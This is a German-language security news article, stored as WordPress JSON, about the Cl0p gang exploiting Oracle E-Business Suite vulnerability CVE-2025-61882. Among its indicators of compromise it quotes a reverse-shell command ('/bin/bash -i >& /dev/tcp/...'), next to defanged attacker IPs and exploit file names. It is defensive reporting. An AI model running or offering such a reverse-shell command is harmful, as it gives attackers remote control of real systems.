{"id":5211,"date":"2025-10-06T16:52:14","date_gmt":"2025-10-06T16:52:14","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=5211"},"modified":"2025-10-06T16:52:14","modified_gmt":"2025-10-06T16:52:14","slug":"cl0p-nutzt-schwachstelle-bei-oracle-aus","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=5211","title":{"rendered":"Cl0p nutzt Schwachstelle bei Oracle aus"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n
\n

Die Cl0p-Bande nutzt Zero-Day-Schwachstelle bei Oracle f\u00fcr Cyberattacken aus.<\/p>\n

Dragos Asaftei \/ Shutterstock<\/p>\n<\/div>\n

Oracle hat ein Notfall-Update ver\u00f6ffentlicht, um eine kritische Sicherheitsl\u00fccke in seiner E-Business Suite (EBS) zu beheben. Das Leck mit Kennung CVE-2025-61882<\/a> hat einen CVSS-Score von 9,8 und wurde bereits bei der j\u00fcngsten Welle von Cl0p zum Diebstahl von Daten ausgenutzt.<\/p>\n

Die Sicherheitsl\u00fccke betrifft einen nicht n\u00e4her bezeichneten Fehler, der es einem nicht authentifizierten Angreifer mit Netzwerkzugriff \u00fcber HTTP erm\u00f6glichen soll, die Oracle Concurrent-Processing-Komponente zu kompromittieren und so die Kontrolle zu \u00fcbernehmen.<\/p>\n

Zugriff aus der Ferne<\/h2>\n

\u201eDiese Sicherheitsl\u00fccke kann ohne Authentifizierung remote ausgenutzt werden, also \u00fcber ein Netzwerk, ohne Benutzername und Passwort\u201c, so Oracle<\/a>. Bei erfolgreichem Exploit sei ein Angreifer dann in der Lage, \u00fcber die Sicherheitsl\u00fccke aus der Ferne b\u00f6sartigen Code ausf\u00fchren.<\/p>\n

Laut Rob Duhart<\/a>, Chief Security Officer von Oracle, sollten Unternehmen auf Indikatoren f\u00fcr eine Kompromittierung (IoCs) achten. Die folgenden IP-Adressen und Artefakte deuteten dabei auf eine m\u00f6gliche Beteiligung der Scattered LAPSUS$ Hunters-Gruppe an dem Exploit hin:<\/p>\n

200.107.207[.]26 (Potenzielle GET- und POST-Aktivit\u00e4t)<\/p>\n

185.181.60[.]11 (Potenzielle GET- und POST-Aktivit\u00e4t)<\/p>\n

sh -c \/bin\/bash -i >& \/dev\/tcp\/\/ 0>&1 (Herstellen einer ausgehenden TCP-Verbindung \u00fcber eine bestimmte port)<\/p>\n

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip<\/p>\n

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters\/exp.py<\/p>\n

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters\/server.py<\/p>\n

Kompromittierung per Mail<\/h2>\n

Der Sicherheitsanbieter Mandiant beschreibt die Breaches als eine \u201emassive E-Mail-Kampagne\u201c, die von Hunderten kompromittierten Konten aus gestartet wurde. \u201eCl0p nutzte mehrere Schwachstellen in Oracle EBS aus und konnte so im August 2025 gro\u00dfe Datenmengen von mehreren Opfern stehlen\u201c, erkl\u00e4rte Charles Carmakal, CTO von Mandiant, in einem LinkedIn<\/a>-Post.<\/p>\n

Er f\u00fcgte hinzu, dass mehrere Schwachstellen ausgenutzt wurden, darunter \u201eSchwachstellen, die im Oracle-Update vom Juli 2025 gepatcht wurden, sowie eine, die an diesem Wochenende gepatcht wurde (CVE-2025-61882).\u201c<\/p>\n

Angesichts der bereits erfolgten, massenhaften Zero-Day-Ausnutzung (und der wahrscheinlich weiteren N-Day-Ausnutzung durch andere Akteure) sollten Unternehmen unabh\u00e4ngig vom Zeitpunkt der Patch-Anwendung pr\u00fcfen, ob sie bereits kompromittiert wurden\u201c, so Carmakal.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

Die Cl0p-Bande nutzt Zero-Day-Schwachstelle bei Oracle f\u00fcr Cyberattacken aus. Dragos Asaftei \/ Shutterstock Oracle hat ein Notfall-Update ver\u00f6ffentlicht, um eine kritische Sicherheitsl\u00fccke in seiner E-Business Suite (EBS) zu beheben. Das Leck mit Kennung CVE-2025-61882 hat einen CVSS-Score von 9,8 und wurde bereits bei der j\u00fcngsten Welle von Cl0p zum Diebstahl von Daten ausgenutzt. Die Sicherheitsl\u00fccke […]<\/p>\n","protected":false},"author":0,"featured_media":5212,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-5211","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5211"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5211"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5211\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/5212"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}